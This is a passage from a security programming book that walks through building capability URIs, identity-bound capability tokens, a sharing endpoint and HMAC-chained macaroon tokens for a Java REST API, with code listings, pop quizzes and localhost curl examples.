            Set.of("owner", "moderator", "member", "observer");

    private final Database database;
    // Add the CapabilityController as a new field and
    // constructor argument.
    private final CapabilityController capabilityController;

    public SpaceController(Database database,
                           CapabilityController capabilityController) {
        this.database = database;
        this.capabilityController = capabilityController;
    }
The next step is to adjust the createSpace method to use the CapabilityController
to create a capability URI to return, as shown in listing 9.3. The code changes are very
minimal: simply call the createUri method to create the capability URI. As the user
that creates a space is given full permissions over it, you can pass in all permissions
when creating the URI. Once a space has been created, the only way to access it will be
through the capability URI, so ensure that this link doesn't expire by passing a large expiry time. Then use the uri.toASCIIString() method to convert the URI into a
properly encoded string. Because you’re going to use capabilities for access you can
remove the lines that insert into the user_roles table; these are no longer needed.
Open SpaceController.java in your editor and adjust the implementation of the createSpace method to match listing 9.3.
public JSONObject createSpace(Request request, Response response) {
var json = new JSONObject(request.body());
var spaceName = json.getString("name");
if (spaceName.length() > 255) {
throw new IllegalArgumentException("space name too long");
}
var owner = json.getString("owner");
if (!owner.matches("[a-zA-Z][a-zA-Z0-9]{1,29}")) {
throw new IllegalArgumentException("invalid username");
}
var subject = request.attribute("subject");
if (!owner.equals(subject)) {
throw new IllegalArgumentException(
"owner must match authenticated user");
}
return database.withTransaction(tx -> {
var spaceId = database.findUniqueLong(
"SELECT NEXT VALUE FOR space_id_seq;");
database.updateUnique(
"INSERT INTO spaces(space_id, name, owner) " +
"VALUES(?, ?, ?);", spaceId, spaceName, owner);
// Ensure the link doesn't expire.
var expiry = Duration.ofDays(100000);
// Create a capability URI with full permissions.
var uri = capabilityController.createUri(request,
"/spaces/" + spaceId, "rwd", expiry);
response.status(201);
// Return the URI as a string in the Location header and JSON response.
response.header("Location", uri.toASCIIString());
return new JSONObject()
.put("name", spaceName)
.put("uri", uri);
});
}
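As a reminder, the createUri method being called here is the one added to the
CapabilityController earlier in the chapter. A minimal sketch of its shape at
this point, assuming the DatabaseTokenStore-backed version before any user
binding is added (listing 9.9 extends it later), looks like this:

public URI createUri(Request request, String path, String perms,
        Duration expiryDuration) {
    // Capabilities are not identity-based, so the token has no user;
    // this is why the NOT NULL constraint was removed from the schema.
    var token = new Token(Instant.now().plus(expiryDuration), null);
    token.attributes.put("path", path);
    token.attributes.put("perms", perms);
    var tokenId = tokenStore.create(request, token);
    // Append the token to the resource path as a query parameter.
    var uri = URI.create(request.uri());
    return uri.resolve(path + "?access_token=" + tokenId);
}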
VALIDATING CAPABILITIES
Although you are returning a capability URL, the Natter API is still using RBAC to
grant access to operations. To convert the API to use capabilities instead, you can
replace the current UserController.lookupPermissions method, which determines
permissions by looking up the authenticated user’s roles, with an alternative that reads
the permissions directly from the capability token. Listing 9.4 shows the implementa-
tion of a lookupPermissions filter for the CapabilityController.
The filter first checks for a capability token in the access_token query parameter.
If no token is present, then it returns without setting any permissions. This will result
in no access being granted. After that, you need to check that the resource being
accessed exactly matches the resource that the capability is for. In this case, you can
check that the path being accessed matches the path stored in the token attributes, by
looking at the request.pathInfo() method. If all these conditions are satisfied, then
you can set the permissions on the request based on the permissions stored in the
capability token. This is the same perms request attribute that you set in chapter 8
when implementing RBAC, so the existing permission checks on individual API calls
will work as before, picking up the permissions from the capability URI rather than
from a role lookup. Open CapabilityController.java in your editor and add the new
method from listing 9.4.

Listing 9.4 Validating a capability token
public void lookupPermissions(Request request, Response response) {
// Look up the token from the query parameters.
var tokenId = request.queryParams("access_token");
if (tokenId == null) { return; }
// Check that the token is valid and matches the resource path.
tokenStore.read(request, tokenId).ifPresent(token -> {
var tokenPath = token.attributes.get("path");
if (Objects.equals(tokenPath, request.pathInfo())) {
// Copy the permissions from the token to the request.
request.attribute("perms",
token.attributes.get("perms"));
}
});
}
To complete the switch-over to capabilities you then need to change the filters used to
lookup the current user’s permissions to instead use the new capability filter. Open
Main.java in your editor and locate the three before() filters that currently call user-
Controller::lookupPermissions and change them to call the capability controller
filter. I’ve highlighted the change of controller in bold:
before("/spaces/:spaceId/messages",
capController::lookupPermissions);
before("/spaces/:spaceId/messages/*",
capController::lookupPermissions);
before("/spaces/:spaceId/members",
capController::lookupPermissions);
You can now restart the API server, create a user, and then create a new social space.
This works exactly like before, but now you get back a capability URI in the response
to creating the space:
$ curl -X POST -H 'Content-Type: application/json' \
-d '{"name":"test","owner":"demo"}' \
-u demo:password https://localhost:4567/spaces
{"name":"test",
➥ "uri":"https://localhost:4567/spaces/1?access_token=
➥ jKbRWGFDuaY5yKFyiiF3Lhfbz-U"}
TIP
You may be wondering why you had to create a user and authenticate
before you could create a space in the last example. After all, didn’t we just
move away from identity-based security? The answer is that the identity is not
being used to authorize the action in this case, because no permissions are
required to create a new social space. Instead, authentication is required
purely for accountability, so that there is a record in the audit log of who cre-
ated the space.
9.2.3 HATEOAS
You now have a capability URI returned from creating a social space, but you can’t do
much with it. The problem is that this URI allows access to only the resource repre-
senting the space itself, but to read or post messages to the space the client needs to
access the sub-resource /spaces/1/messages instead. Previously, this wouldn’t be a
problem because the client could just construct the path to get to the messages and
use the same token to also access that resource. But a capability token gives access to
only a single specific resource, following POLA. To access the messages, you’ll need a
different capability, but capabilities are unforgeable so you can’t just create one! It
seems like this capability-based security model is a real pain to use.
If you are a RESTful design aficionado, you may know that having the client just
know that it needs to add /messages to the end of a URI to access the messages is a
violation of a central REST principle, which is that client interactions should be
driven by hypertext (links). Rather than a client needing to have specific knowledge
about how to access resources in your API, the server should instead tell the client
where resources are and how to access them. This principle is given the snappy title
Hypertext as the Engine of Application State, or HATEOAS for short. Roy Fielding, the
originator of the REST design principles, has stated that this is a crucial aspect of
REST API design (http://mng.bz/Jx6v).
PRINCIPLE
HATEOAS, or hypertext as the engine of application state, is a central
principle of REST API design that states that a client should not need to have
specific knowledge of how to construct URIs to access your API. Instead, the
server should provide this information in the form of hyperlinks and form
templates.
The aim of HATEOAS is to reduce coupling between the client and server that would
otherwise prevent the server from evolving its API over time because it might break
assumptions made by clients. But HATEOAS is also a perfect fit for capability URIs
because we can return new capability URIs as links in response to using another capa-
bility URI, allowing a client to securely navigate from resource to resource without
needing to manufacture any URIs by themselves.4
4 In this chapter, you’ll return links as URIs within normal JSON fields. There are standard ways of representing
links in JSON, such as JSON-LD (https://json-ld.org), but I won’t cover those in this book.
You can allow a client to access and post new messages to the social space by
returning a second URI from the createSpace operation that allows access to the
messages resource for this space, as shown in listing 9.5. You simply create a second
capability URI for that path and return it as another link in the JSON response. Open
SpaceController.java in your editor again and update the end of the createSpace
method to create the second link. The new lines of code are highlighted in bold.

Listing 9.5 Adding a messages link
var uri = capabilityController.createUri(request,
"/spaces/" + spaceId, "rwd", expiry);
// Create a new capability URI for the messages.
var messagesUri = capabilityController.createUri(request,
"/spaces/" + spaceId + "/messages", "rwd", expiry);
response.status(201);
response.header("Location", uri.toASCIIString());
return new JSONObject()
.put("name", spaceName)
.put("uri", uri)
// Return the messages URI as a new field in the response.
.put("messages", messagesUri);
If you restart the API server again and create a new space, you’ll see both URIs are
now returned. A GET request to the messages URI will return a list of messages in the
space, and this can now be accessed by anybody with that capability URI. For example,
you can open that link directly in a web browser. You can also POST a new message to
the same URI. Again, this operation requires authentication in addition to the capa-
bility URI because the message explicitly claims to be from a particular user and so the
API should authenticate that claim. Permission to post the message comes from the
capability, while proof of identity comes from authentication:
$ curl -X POST -H 'Content-Type: application/json' \
-u demo:password \
-d '{"author":"demo","message":"Hello!"}' \
'https://localhost:4567/spaces/1/messages?access_token=
➥ u9wu69dl5L8AT9FNe03TM-s4H8M'
SUPPORTING DIFFERENT LEVELS OF ACCESS
The capability URIs returned so far provide full access to the resources that they iden-
tify, as indicated by the rwd permissions (read-write-delete, if you remember from
chapter 3). This means that it’s impossible to give somebody else access to the space
without giving them full access to delete other users' messages. So much for POLA!
One solution to this is to return multiple capability URIs with different levels of
access, as shown in listing 9.6. The space owner can then give out the more restricted
URIs while keeping the URI that grants full privileges for trusted moderators only.
Open SpaceController.java again and add the additional capabilities from the listing.
Restart the API and try performing different actions with different capabilities.
Listing 9.6 Restricted capabilities

var uri = capabilityController.createUri(request,
"/spaces/" + spaceId, "rwd", expiry);
var messagesUri = capabilityController.createUri(request,
"/spaces/" + spaceId + "/messages", "rwd", expiry);
// Create additional capability URIs with restricted permissions.
var messagesReadWriteUri = capabilityController.createUri(
request, "/spaces/" + spaceId + "/messages", "rw",
expiry);
var messagesReadOnlyUri = capabilityController.createUri(
request, "/spaces/" + spaceId + "/messages", "r",
expiry);
response.status(201);
response.header("Location", uri.toASCIIString());
return new JSONObject()
.put("name", spaceName)
.put("uri", uri)
// Return the additional capabilities.
.put("messages-rwd", messagesUri)
.put("messages-rw", messagesReadWriteUri)
.put("messages-r", messagesReadOnlyUri);
To complete the conversion of the API to capability-based security, you need to go
through the other API actions and convert each to return appropriate capability URIs.
This is largely a straightforward task, so we won’t cover it here. One aspect to be aware
of is that you should ensure that the capabilities you return do not grant more permis-
sions than the capability that was used to access a resource. For example, if the capa-
bility used to list messages in a space granted only read permissions, then the links to
individual messages within a space should also be read-only. You can enforce this by
always basing the permissions for a new link on the permissions set for the current
request, as shown in listing 9.7 for the findMessages method. Rather than providing
read and delete permissions for all messages, you instead use the permissions from
the existing request. This ensures that users in possession of a moderator capability
will see links that allow both reading and deleting messages, while ordinary access
through a read-write or read-only capability will only see read-only message links.
var perms = request.<String>attribute("perms")
.replace("w", "");
response.status(200);
return new JSONArray(messages.stream()
.map(msgId -> "/spaces/" + spaceId + "/messages/" + msgId)
.map(path ->
capabilityController.createUri(request, path, perms))
.collect(Collectors.toList()));
Update the remaining methods in the SpaceController.java file to return appropriate
capability URIs, remembering to follow POLA. The GitHub repository accompanying
the book (https://github.com/NeilMadden/apisecurityinaction) has completed source
code if you get stuck, but I’d recommend trying this yourself first.
TIP
You can use the ability to specify different expiry times for links to imple-
ment useful functionality. For example, when a user posts a new message, you
can return a link that lets them edit it for a few minutes only. A separate link
can provide permanent read-only access. This allows users to correct mistakes
but not change historical messages.
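To sketch what that might look like, the following is one possible shape for
the end of a postMessage method; the method and field names here are
illustrative assumptions, not code from the chapter:

// Hypothetical sketch: a short-lived edit link plus a permanent
// read-only link for a newly created message.
var msgPath = "/spaces/" + spaceId + "/messages/" + msgId;
var editUri = capabilityController.createUri(request, msgPath, "w",
        Duration.ofMinutes(5));      // correct mistakes for 5 minutes only
var readUri = capabilityController.createUri(request, msgPath, "r",
        Duration.ofDays(100000));    // effectively permanent read access
return new JSONObject()
        .put("edit", editUri)
        .put("read", readUri);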
9.2.4 Capability URIs for browser-based clients
In section 9.2.1, I mentioned that putting the token in the URI path or query parame-
ters is less than ideal because these can leak in audit logs, Referer headers, and
through your browser history. These risks are limited when capability URIs are used in
an API but can be a real problem when these URIs are directly exposed to users in a
web browser client. If you use capability URIs in your API, browser-based clients will
need to somehow translate the URIs used in the API into URIs used for navigating the
UI. A natural approach would be to use capability URIs for this too, reusing the
tokens from the API URIs. In this section, you’ll see how to do this securely.
Pop quiz

3  The capability URIs for each space use never-expiring database tokens. Over
   time, this will fill the database with tokens. Which of the following are ways you
   could prevent this?
   a) Hashing tokens in the database
   b) Using a self-contained token format such as JWTs
   c) Using a cloud-native database that can scale up to hold all the tokens
   d) Using the HmacTokenStore in addition to the DatabaseTokenStore
   e) Reusing an existing token when the same capability has already been issued

4  Which is the main reason why HATEOAS is an important design principle when
   using capability URIs? Pick one answer.
   a) HATEOAS is a core part of REST.
   b) Capability URIs are hard to remember.
   c) Clients can't be trusted to make their own URIs.
   d) Roy Fielding, the inventor of REST, says that it's important.
   e) A client can't make their own capability URIs and so can only access other
      resources through links.

The answers are at the end of the chapter.

One approach to this problem is to put the token in a part of the URI that is not
usually sent to the server or included in Referer headers. The original solution was
developed for the Waterken server that used capability URIs extensively, under the
name web-keys (http://waterken.sourceforge.net/web-key/). In a web-key, the unguess-
able token is stored in the fragment component of the URI; that is, the bit after a #
character at the end of the URI. The fragment is normally used to jump to a particular
location within a larger document, and has the advantage that it is never sent to the
server by clients and never included in a Referer header or window.referrer field in
JavaScript, and so is less susceptible to leaking. The downside is that because the
server doesn’t see the token, the client must extract it from the URI and send it to the
server by other means.
In Waterken, which was designed for web applications, when a user clicked a web-
key link in the browser, it loaded a simple template JavaScript page. The JavaScript
then extracted the token from the query fragment (using the window.location.hash
variable) and made a second call to the web server, passing the token in a query
parameter. The flow is shown in figure 9.3.
Because the JavaScript template itself contains no sensitive data and is the same for
all URIs, it can be served with long-lived cache-control headers and so after the
browser has loaded it once, it can be reused for all subsequent capability URIs without
an extra call to the server, as shown in the lower half of figure 9.3. This approach
works well with single-page apps (SPAs) because they often already use the fragment
in this way to permit navigation in the app without causing the page to reload while
still populating the browser history.
WARNING
Although the fragment component is not sent to the server, it will
be included if a redirect occurs. If your app needs to redirect to another site,
you should always explicitly include a fragment component in the redirect
URI to avoid accidentally leaking tokens in this way.
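For example, with Spark you might append an explicit (empty) fragment when
redirecting to an external site; the target URL here is made up for
illustration:

// The explicit "#" replaces the current fragment so the capability
// token is not copied onto the redirect URI by the browser.
response.redirect("https://external.example.com/login#");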
Listing 9.8 shows how to parse and load a capability URI in this format from a Java-
Script API client. It first parses the URI using the URL class and extracts the token from
the hash field, which contains the fragment component. This field includes the literal
“#” character at the start, so use hash.substring(1) to remove this. You should then
remove this component from the URI to send to the API and instead add the token
back as a query parameter. This ensures that the CapabilityController will see the
token in the expected place. Navigate to src/main/resources/public and create a new
file named capability.js with the contents of the listing.
NOTE
This code assumes that UI pages correspond directly to URIs in your
API. For an SPA this won’t be true, and there is (by definition) a single UI page
that handles all requests. In this case, you’ll need to encode the API path
and the token into the fragment together in a form such as #/spaces/1/
messages&tok=abc123. Modern frameworks such as Vue or React can use the
HTML 5 history API to make SPA URIs look like normal URIs (without the
fragment). When using these frameworks, you should ensure the token is in
the real fragment component; otherwise, the security benefits are lost.
Listing 9.8 Loading a capability URI from JavaScript

function getCap(url, callback) {
// Parse the URL and extract the token from the fragment (hash) component.
let capUrl = new URL(url);
let token = capUrl.hash.substring(1);
// Blank out the fragment.
capUrl.hash = '';
// Add the token to the URI query parameters.
capUrl.search = '?access_token=' + token;
// Now fetch the URI to call the API with the token.
return fetch(capUrl.href)
.then(response => response.json())
.then(callback)
.catch(err => console.error('Error: ', err));
}
Figure 9.3 In the Waterken web-key design for capability URIs, the token is
stored in the fragment of the URI, which is never sent to the server. When a
browser loads such a URI, it will initially load a static JavaScript page that then
extracts the token from the fragment and uses it to make Ajax requests to the
API. The JavaScript template can be cached by the browser, avoiding the extra
roundtrip for subsequent requests.
9.2.5 Combining capabilities with identity
All calls to the Natter API are now authorized purely using capability tokens, which
are scoped to an individual resource and not tied to any user. As you saw with the sim-
ple message browser example in the last section, you can even hard-code read-only
capability URIs into a web page to allow completely anonymous browsing of messages.
Some API calls still require user authentication though, such as creating a new space
or posting a message. The reason is that those API actions involve claims about who
the user is, so you still need to authenticate those claims to ensure they are genuine,
for accountability reasons rather than for authorization. Otherwise, anybody with a
capability URI to post messages to a space could use it to impersonate any other user.
You may also want to positively identify users for other reasons, such as to ensure
you have an accurate audit log of who did what. Because a capability URI may be
shared by lots of users, it is useful to identify those users independently from how
their requests are authorized. Finally, you may want to apply some identity-based
access controls on top of the capability-based access. For example, in Google Docs
(https://docs.google.com) you can share documents using capability URIs, but you
can also restrict this sharing to only users who have an account in your company’s
domain. To access the document, a user needs to both have the link and be signed
into a Google account linked to the same company.
There are a few ways to communicate identity in a capability-based system:

- You can associate a username and other identity claims with each capability
  token. The permissions in the token are still what grants access, but the token
  additionally authenticates identity claims about the user that can be used for
  audit logging or additional access checks. The major downside of this approach
  is that sharing a capability URI lets the recipient impersonate you whenever
  they make calls to the API using that capability. Nevertheless, this approach can
  be useful when generating short-lived capabilities that are only intended for a
  single user. The link sent in a password reset email can be seen as this kind of
  capability URI because it provides a limited-time capability to reset the password
  tied to one user's account.
- You could use a traditional authentication mechanism, such as a session cookie,
  to identify the user in addition to requiring a capability token, as shown in
  figure 9.4. The cookie would no longer be used to authorize API calls but would
  instead be used to identify the user for audit logging or for additional checks.
  Because the cookie is no longer used for access control, it is less sensitive and so
  can be a long-lived persistent cookie, reducing the need for the user to
  frequently log in.

Pop quiz

5  Which of the following is the main security risk when including a capability token
   in the fragment component of a URI?
   a) URI fragments aren't RESTful.
   b) The random token makes the URI look ugly.
   c) The fragment may be leaked in server logs and the HTTP Referer header.
   d) If the server performs a redirect, the fragment will be copied to the new URI.
   e) The fragment may already be used for other data, causing it to be overwritten.

The answer is at the end of the chapter.
When developing a REST API, the second option is often attractive because you can
reuse traditional cookie-based authentication technologies such as a centralized
OpenID Connect identity provider (chapter 7). This is the approach taken in the Nat-
ter API, where the permissions for an API call come from a capability URI, but some
API calls need additional user authentication using a traditional mechanism such as
HTTP Basic authentication or an authentication token or cookie.
To switch back to using cookies for authentication, open the Main.java file in your
editor and find the lines that create the TokenController object. Change the token-
Store variable to use the CookieTokenStore that you developed back in chapter 4:
SecureTokenStore tokenStore = new CookieTokenStore();
var tokenController = new TokenController(tokenStore);
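To see how the two mechanisms combine, a simple audit filter could record
both attributes on each request; the attribute names match the ones used in
this chapter, but the filter itself is just an illustrative sketch:

before((request, response) -> {
    var subject = request.attribute("subject"); // identity, from the cookie
    var perms = request.attribute("perms");     // authority, from the capability
    System.out.printf("audit: user=%s perms=%s path=%s%n",
            subject, perms, request.pathInfo());
});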
Figure 9.4 By combining capability URIs with a traditional authentication
mechanism such as cookies, the API can enforce access using capabilities while
authenticating identity claims using the cookie. The same capability URI can be
shared between users, but the API is still able to positively identify each of them.

9.2.6 Hardening capability URIs
You may wonder if you can do away with the anti-CSRF token now that you’re using
capabilities for access control, which are immune to CSRF. This would be a mistake,
because an attacker that has a genuine capability to access the API can still use a CSRF
attack to make their requests appear to come from a different user. The authority to
access the API comes from the attacker’s capability URI, but the identity of the user
comes from the cookie. If you keep the existing anti-CSRF token though, clients are
required to send three credentials on every request:
- The cookie identifying the user
- The anti-CSRF token
- The capability token authorizing the specific request
This is a bit excessive. At the same time, the capability tokens are vulnerable to being
stolen. For example, if a capability URI meant for a moderator is stolen, then it can be
used by anybody to delete messages. You can solve both problems by tying the capabil-
ity tokens to an authenticated user and preventing them being used by anybody else.
This removes one of the benefits of capability URIs—that they are easy to share—but
improves the overall security:
- If a capability token is stolen, it can't be used without a valid login cookie for
  the user. If the cookie is set with the HttpOnly and Secure flags, then it becomes
  much harder to steal.
- You can now remove the separate anti-CSRF token because each capability URI
  effectively acts as an anti-CSRF token. The cookie can't be used without the
  capability and the capability can't be used without the cookie.
Listing 9.9 shows how to associate a capability token with an authenticated user by
populating the username attribute of the token that you previously left blank. Open
the CapabilityController.java file in your editor and add the highlighted lines of code.

Listing 9.9 Linking a capability with a user
public URI createUri(Request request, String path, String perms,
Duration expiryDuration) {
// Look up the authenticated user.
var subject = (String) request.attribute("subject");
// Associate the capability with the user.
var token = new Token(now().plus(expiryDuration), subject);
token.attributes.put("path", path);
token.attributes.put("perms", perms);
var tokenId = tokenStore.create(request, token);
var uri = URI.create(request.uri());
return uri.resolve(path + "?access_token=" + tokenId);
}
You can then adjust the lookupPermissions method in the same file to return no per-
missions if the username associated with the capability token doesn’t match the
authenticated user, as shown in listing 9.10. This ensures that the capability can’t be
used without an associated session for the user and that the session cookie can only
be used when it matches the capability token, effectively preventing CSRF attacks too.
Listing 9.10 Verifying the user

public void lookupPermissions(Request request, Response response) {
var tokenId = request.queryParams("access_token");
if (tokenId == null) { return; }
tokenStore.read(request, tokenId).ifPresent(token -> {
// If the authenticated user doesn't match the capability,
// it returns no permissions.
if (!Objects.equals(token.username,
request.attribute("subject"))) {
return;
}
var tokenPath = token.attributes.get("path");
if (Objects.equals(tokenPath, request.pathInfo())) {
request.attribute("perms",
token.attributes.get("perms"));
}
});
}
You can now delete the code that checks the anti-CSRF token in the CookieToken-
Store if you wish and rely on the capability code to protect against CSRF. Refer to
chapter 4 to see how the original version looked before CSRF protection was added.
You’ll also need to adjust the TokenController.validateToken method to not
reject a request that doesn’t have an anti-CSRF token. If you get stuck, check out
chapter09-end of the GitHub repository accompanying the book, which has all the
required changes.
SHARING ACCESS
Because capability URIs are now tied to individual users, you need a new mechanism
to share access to social spaces and individual messages. Listing 9.11 shows a new oper-
ation to allow a user to exchange one of their own capability URIs for one for a differ-
ent user, with an option to specify a reduced set of permissions. The method reads a
capability URI from the input and looks up the associated token. If the URI matches
the token and the requested permissions are a subset of the permissions granted by
the original capability URI, then the method creates a new capability token with the
new permissions and user and returns the requested URI. This new URI can then be
safely shared with the intended user. Open the CapabilityController.java file and add
the new method.

Listing 9.11 Sharing capability URIs
public JSONObject share(Request request, Response response) {
var json = new JSONObject(request.body());
// Parse the original capability URI and extract the token.
var capUri = URI.create(json.getString("uri"));
var path = capUri.getPath();
var query = capUri.getQuery();
var tokenId = query.substring(query.indexOf('=') + 1);
// Look up the token and check that it matches the URI.
var token = tokenStore.read(request, tokenId).orElseThrow();
if (!Objects.equals(token.attributes.get("path"), path)) {
throw new IllegalArgumentException("incorrect path");
}
// Check that the requested permissions are a subset
// of the token permissions.
var tokenPerms = token.attributes.get("perms");
var perms = json.optString("perms", tokenPerms);
if (!tokenPerms.contains(perms)) {
Spark.halt(403);
}
// Create and store the new capability token.
var user = json.getString("user");
var newToken = new Token(token.expiry, user);
newToken.attributes.put("path", path);
newToken.attributes.put("perms", perms);
var newTokenId = tokenStore.create(request, newToken);
// Return the requested capability URI.
var uri = URI.create(request.uri());
var newCapUri = uri.resolve(path + "?access_token="
+ newTokenId);
return new JSONObject()
.put("uri", newCapUri);
}
You can now add a new route to the Main class to expose this new operation. Open the
Main.java file and add the following line to the main method:
post("/capabilities", capController::share);
You can now call this endpoint to exchange a privileged capability URI, such as the
messages-rwd URI returned from creating a space, as in the following example:
curl -H 'Content-Type: application/json' \
-d '{"uri":"/spaces/1/messages?access_token=
➥ 0ed8-IohfPQUX486d0kr03W8Ec8", "user":"demo2", "perms":"r"}' \
https://localhost:4567/capabilities
{"uri":"/spaces/1/messages?access_token=
➥ 1YQqZdNAIce5AB_Z8J7ClMrnx68"}
The new capability URI in the response can only be used by the demo2 user and pro-
vides only read permission on the space. You can use this facility to build resource
sharing for your APIs. For example, if a user directly shares a capability URI of their
own with another user, rather than denying access completely you could allow them to
request access. This is what happens in Google Docs if you follow a link to a document
that you don’t have access to. The owner of the document can then approve access. In
Google Docs this is done by adding an entry to an access control list (chapter 3) asso-
ciated with each document, but with capabilities, the owner could generate a capabil-
ity URI instead that is then emailed to the recipient.
9.3 Macaroons: Tokens with caveats
Capabilities allow users to easily share fine-grained access to their resources with other
users. If a Natter user wants to share one of their messages with somebody who doesn’t
have a Natter account, they can easily do this by creating a read-only capability URI for
that specific message. The other user will be able to read only that one message and
won’t get access to any other messages or the ability to post messages themselves.
Sometimes the granularity of capability URIs doesn’t match up with how users
want to share resources. For example, suppose that you want to share read-only access
to a snapshot of the conversations since yesterday in a social space. It’s unlikely that
the API will always supply a capability URI that exactly matches the user’s wishes; the
createSpace action already returns four URIs, and none of them quite fit the bill.
Macaroons provide a solution to this problem by allowing anybody to append caveats
to a capability that restrict how it can be used. Macaroons were invented by a team of
academic and Google researchers in a paper published in 2014 (https://ai.google/
research/pubs/pub41892).
DEFINITION
A macaroon is a type of cryptographic token that can be used to
represent capabilities and other authorization grants. Anybody can append
new caveats to a macaroon that restrict how it can be used.
To address our example, the user could append the following caveats to their capa-
bility to create a new capability that allows only read access to messages since lunch-
time yesterday:
method = GET
since >= 2019-10-12T12:00:00Z
Unlike the share method that you added in section 9.2.6, macaroon caveats can
express general conditions like these. The other benefit of macaroons is that anyone
can append a caveat to a macaroon using a macaroon library, without needing to call
an API endpoint or have access to any secret keys. Once the caveat has been added it
can’t be removed.
Macaroons use HMAC-SHA256 tags to protect the integrity of the token and any
caveats just like the HmacTokenStore you developed in chapter 5. To allow anybody to
append caveats to a macaroon, even if they don’t have the key, macaroons use an
interesting property of HMAC: the authentication tag output from HMAC can itself
be used as a key to sign a new message with HMAC. To append a caveat to a maca-
roon, you use the old authentication tag as the key to compute a new HMAC-SHA256
tag over the caveat, as shown in figure 9.5. You then throw away the old authentication
tag and append the caveat and the new tag to the macaroon. Because it’s infeasible to
reverse HMAC to recover the old tag, nobody can remove caveats that have been
added unless they have the original key.
Figure 9.5 To append a new caveat to a macaroon, you use the old HMAC
tag as the key to authenticate the new caveat. You then throw away the
old tag and append the new caveat and tag. Because nobody can reverse
HMAC to calculate the old tag, they cannot remove the caveat.
WARNING
Because anybody can add a caveat to a macaroon, it is important
that they are used only to restrict how a token is used. You should never trust
any claims in a caveat or grant additional access based on their contents.
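To make the chaining concrete, here is a minimal sketch of the append
operation in plain javax.crypto, mirroring the verification code in
listing 9.12 (this is purely illustrative; the macaroon library performs
this step for you):

private static byte[] appendCaveatTag(byte[] oldTag, String caveat)
        throws Exception {
    // Use the old authentication tag as the HMAC key for the new caveat.
    var hmac = Mac.getInstance("HmacSHA256");
    hmac.init(new SecretKeySpec(oldTag, "HmacSHA256"));
    // The result becomes the macaroon's new tag; the old tag is discarded.
    return hmac.doFinal(caveat.getBytes(UTF_8));
}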
When the macaroon is presented back to the API, it can use the original HMAC key to
reconstruct the original tag and all the caveat tags and check if it comes up with the
same signature value at the end of the chain of caveats. Listing 9.12 shows an example
of how to verify an HMAC chain just like that used by macaroons.
First initialize a javax.crypto.Mac object with the API’s authentication key (see
chapter 5 for how to generate this) and then compute an initial tag over the maca-
roon unique identifier. You then loop through each caveat in the chain and compute
a new HMAC tag over the caveat, using the old tag as the key.5 Finally, you compare
the computed tag with the tag that was supplied with the macaroon using a constant-
time equality function. Listing 9.12 is just to demonstrate how it works; you'll use
real macaroon library in the Natter API so you don’t need to implement this method.
Listing 9.12 Verifying the HMAC chain

private boolean verify(String id, List<String> caveats, byte[] tag)
throws Exception {
// Initialize HMAC-SHA256 with the authentication key.
var hmac = Mac.getInstance("HmacSHA256");
hmac.init(macKey);
// Compute an initial tag over the macaroon identifier.
var computed = hmac.doFinal(id.getBytes(UTF_8));
for (var caveat : caveats) {
// Compute a new tag for each caveat using the old tag as the key.
hmac.init(new SecretKeySpec(computed, "HmacSHA256"));
computed = hmac.doFinal(caveat.getBytes(UTF_8));
}
// Compare the tags with a constant-time equality function.
return MessageDigest.isEqual(tag, computed);
}

5 If you are a functional programming enthusiast, then this can be elegantly written as a left-fold or reduce
operation.
After the HMAC tag has been verified, the API then needs to check that the caveats
are satisfied. There’s no standard set of caveats that APIs support, so like OAuth2
scopes it’s up to the API designer to decide what to support. There are two broad cat-
egories of caveats supported by macaroon libraries:
- First-party caveats are restrictions that can be easily verified by the API at the
  point of use, such as restricting the times of day at which the token can be used.
  First-party caveats are discussed in more detail in section 9.3.3.
- Third-party caveats are restrictions which require the client to obtain a proof
  from a third-party service, such as proof that the user is an employee of a particular
  company or that they are over 18. Third-party caveats are discussed in section 9.3.4.
9.3.1 Contextual caveats
A significant advantage of macaroons over other token forms is that they allow the cli-
ent to attach contextual caveats just before the macaroon is used. For example, a client
that is about to send a macaroon to an API over an untrustworthy communication
channel can attach a first-party caveat limiting it to only be valid for HTTP PUT
requests to that specific URI for the next 5 seconds. That way, if the macaroon is sto-
len, then the damage is limited because the attacker can only use the token in very
restricted circumstances. Because the client can keep a copy of the original unre-
stricted macaroon, their own ability to use the token is not limited in the same way.
DEFINITION
A contextual caveat is a caveat that is added by a client just before
use. Contextual caveats allow the authority of a token to be restricted before
sending it over an insecure channel or to an untrusted API, limiting the dam-
age that might occur if the token is stolen.
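For example, a client using the jmacaroons library (introduced in section 9.3.2)
could restrict a copy of its token just before a request with only a few lines;
the exact caveat strings are whatever the API's verifiers support:

// Restrict a copy of the macaroon to GET requests for the next 5 seconds.
var restricted = MacaroonsBuilder.modify(macaroon)
        .add_first_party_caveat("method = GET")
        .add_first_party_caveat("time < " +
                Instant.now().plus(5, ChronoUnit.SECONDS))
        .getMacaroon();
// Send the restricted token; keep the original for later requests.
var tokenForRequest = restricted.serialize();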
The ability to add contextual caveats makes macaroons one of the most important
recent developments in API security. Macaroons can be used with any token-based
authentication and even OAuth2 access tokens if your authorization server supports
them.6 On the other hand, there is no formal specification of macaroons and aware-
ness and adoption of the format is still quite limited, so they are not as widely sup-
ported as JWTs (chapter 6).
6 My employer, ForgeRock, has added experimental support for macaroons to their authorization server software.
9.3.2 A macaroon token store
To use macaroons in the Natter API, you can use the open source jmacaroons library
(https://github.com/nitram509/jmacaroons). Open the pom.xml file in your editor
and add the following lines to the dependencies section:
<dependency>
<groupId>com.github.nitram509</groupId>
<artifactId>jmacaroons</artifactId>
<version>0.4.1</version>
</dependency>
You can now build a new token store implementation using macaroons as shown in
listing 9.13. To create a macaroon, you’ll first use another TokenStore implementa-
tion to generate the macaroon identifier. You can use any of the existing stores, but to
keep the tokens compact you’ll use the DatabaseTokenStore in these examples. You
could also use the JsonTokenStore, in which case the macaroon HMAC tag also pro-
tects it against tampering.
You then create the macaroon using the MacaroonsBuilder.create() method,
passing in the identifier and the HMAC key. An odd quirk of the macaroon API
means you have to pass the raw bytes of the key using macKey.getEncoded(). You can
also give an optional hint for where the macaroon is intended to be used. Because
you’ll be using these with capability URIs that already include the full location, you
can leave that field blank to save space. You can then use the macaroon.serialize()
method to convert the macaroon into a URL-safe base64 string format. In the same
Natter API project you’ve been using so far, navigate to src/main/java/com/manning/
apisecurityinaction/token and create a new file called MacaroonTokenStore.java.
Copy the contents of listing 9.13 into the file and save it.
WARNING
The location hint is not included in the authentication tag and is
intended only as a hint to the client. Its value shouldn’t be trusted because it
can be tampered with.
Listing 9.13 The MacaroonTokenStore

package com.manning.apisecurityinaction.token;

import java.security.Key;
import java.time.Instant;
import java.time.temporal.ChronoUnit;
import java.util.Optional;

